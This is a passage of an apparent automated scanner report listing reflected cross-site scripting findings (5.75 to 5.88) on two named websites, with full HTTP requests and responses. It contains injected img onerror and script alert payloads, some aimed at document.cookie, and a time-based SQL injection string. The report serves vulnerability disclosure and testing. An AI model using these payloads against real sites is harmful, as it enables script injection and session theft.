X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchc3d36<img src=a onerror=alert(1)>1f123855a7Controller</strong>
...[SNIP]...

5.75. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/Linkbucks%20vlad%20modelS

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19465<img%20src%3da%20onerror%3dalert(1)>7fccbdccd2f was submitted in the REST URL parameter 2. This input was echoed as 19465<img src=a onerror=alert(1)>7fccbdccd2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web19465<img%20src%3da%20onerror%3dalert(1)>7fccbdccd2f/Linkbucks%20vlad%20modelS HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:07:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web19465<img src=a onerror=alert(1)>7fccbdccd2f</strong>
...[SNIP]...

5.76. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dcdb5<img%20src%3da%20onerror%3dalert(1)>4005840d3e2 was submitted in the REST URL parameter 1. This input was echoed as dcdb5<img src=a onerror=alert(1)>4005840d3e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchdcdb5<img%20src%3da%20onerror%3dalert(1)>4005840d3e2/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.3.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchdcdb5<img src=a onerror=alert(1)>4005840d3e2Controller</strong>
...[SNIP]...

5.77. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35e2f<img%20src%3da%20onerror%3dalert(1)>68babb1224f was submitted in the REST URL parameter 2. This input was echoed as 35e2f<img src=a onerror=alert(1)>68babb1224f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f35e2f<img%20src%3da%20onerror%3dalert(1)>68babb1224f/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.3.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:56:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2161

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(1)>7fccbdccd2f35e2f<img src=a onerror=alert(1)>68babb1224f</strong>
...[SNIP]...

5.78. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62284<img%20src%3da%20onerror%3dalert(1)>24266b354e9 was submitted in the REST URL parameter 1. This input was echoed as 62284<img src=a onerror=alert(1)>24266b354e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search62284<img%20src%3da%20onerror%3dalert(1)>24266b354e9/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304737441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129279958.1180364951.1304737441.1304737441.1304737441.1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search62284<img src=a onerror=alert(1)>24266b354e9Controller</strong>
...[SNIP]...

5.79. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e832b<img%20src%3da%20onerror%3dalert(1)>2c7b2edd88e was submitted in the REST URL parameter 2. This input was echoed as e832b<img src=a onerror=alert(1)>2c7b2edd88e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2fe832b<img%20src%3da%20onerror%3dalert(1)>2c7b2edd88e/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304737441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129279958.1180364951.1304737441.1304737441.1304737441.1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2175

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(document.cookie)>7fccbdccd2fe832b<img src=a onerror=alert(1)>2c7b2edd88e</strong>
...[SNIP]...

5.80. http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3addd<img%20src%3da%20onerror%3dalert(1)>060739d97c0 was submitted in the REST URL parameter 1. This input was echoed as 3addd<img src=a onerror=alert(1)>060739d97c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a73addd<img%20src%3da%20onerror%3dalert(1)>060739d97c0/web/a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=129279958.1304823358.2.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/Linkbucks%20vlad%20modelS; __utma=129279958.1180364951.1304737441.1304737441.1304823358.2; __utmc=129279958; __utmb=129279958.1.10.1304823358

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:55:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2172

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<img src=a onerror=alert(1)>1f123855a73addd<img src=a onerror=alert(1)>060739d97c0Controller</strong>
...[SNIP]...

5.81. http://learn.bridgefront.com/sendpassword [button1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the button1 request parameter is copied into the HTML document as plain text between tags. The payload f7917<script>alert(1)</script>a6e02e7e600 was submitted in the button1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Passwordf7917<script>alert(1)</script>a6e02e7e600&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:09:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=AD543B39B2162043DABD3434006F7DBE; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
<b>
SERVER NAME: learn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Passwordf7917<script>alert(1)</script>a6e02e7e600&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.82. http://learn.bridgefront.com/sendpassword [button2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the button2 request parameter is copied into the HTML document as plain text between tags. The payload f1d32<script>alert(1)</script>81b609eefc9 was submitted in the button2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Namef1d32<script>alert(1)</script>81b609eefc9&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:20:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=1A39AB27A0B048AF89C51833109C8048; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
>
SERVER NAME: learn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Namef1d32<script>alert(1)</script>81b609eefc9&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.83. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the forgetbrand request parameter is copied into the HTML document as plain text between tags. The payload e9121<script>alert(1)</script>f3274d52418 was submitted in the forgetbrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=nulle9121<script>alert(1)</script>f3274d52418&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:31:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=9695723B5707A0A14E3F1D2C5FCE2A02; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
earn.bridgefront.com

SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=nulle9121<script>alert(1)</script>f3274d52418&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.84. http://learn.bridgefront.com/sendpassword [forwardpage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the forwardpage request parameter is copied into the HTML document as plain text between tags. The payload 43a96<script>alert(1)</script>7664851d448 was submitted in the forwardpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp43a96<script>alert(1)</script>7664851d448&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:45:38 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=B2D8F44A4079D6989583448FA8EBFCD9; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
SERVER PORT: 80

REMOTE HOST: 173.193.214.243

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp43a96<script>alert(1)</script>7664851d448&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.85. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f2cc<script>alert(1)</script>b056eb85e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3&5f2cc<script>alert(1)</script>b056eb85e91=1 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=4857F165EACF9C1A4E3140B4CD6C7B6B; Path=/
Content-Length: 6474
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
ointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3&5f2cc<script>alert(1)</script>b056eb85e91=1


<table border="0">
...[SNIP]...

5.86. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace0_ul_ request parameter is copied into the HTML document as plain text between tags. The payload 6728f<script>alert(1)</script>cb43f085596 was submitted in the replace0_ul_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--6728f<script>alert(1)</script>cb43f085596&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:59:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=EBDDE581391985FB7AFB4871D64D33CB; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
43

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--6728f<script>alert(1)</script>cb43f085596&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...

5.87. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace1_ul_ request parameter is copied into the HTML document as plain text between tags. The payload 4364a<script>alert(1)</script>7b5aaa36f8a was submitted in the replace1_ul_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=34364a<script>alert(1)</script>7b5aaa36f8a&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:08:42 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=60C3DEE51835B2637DD8623D228E3CF7; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=34364a<script>alert(1)</script>7b5aaa36f8a&totalvalues=3


<table border="0">
...[SNIP]...

5.88. http://learn.bridgefront.com/sendpassword [totalvalues parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail
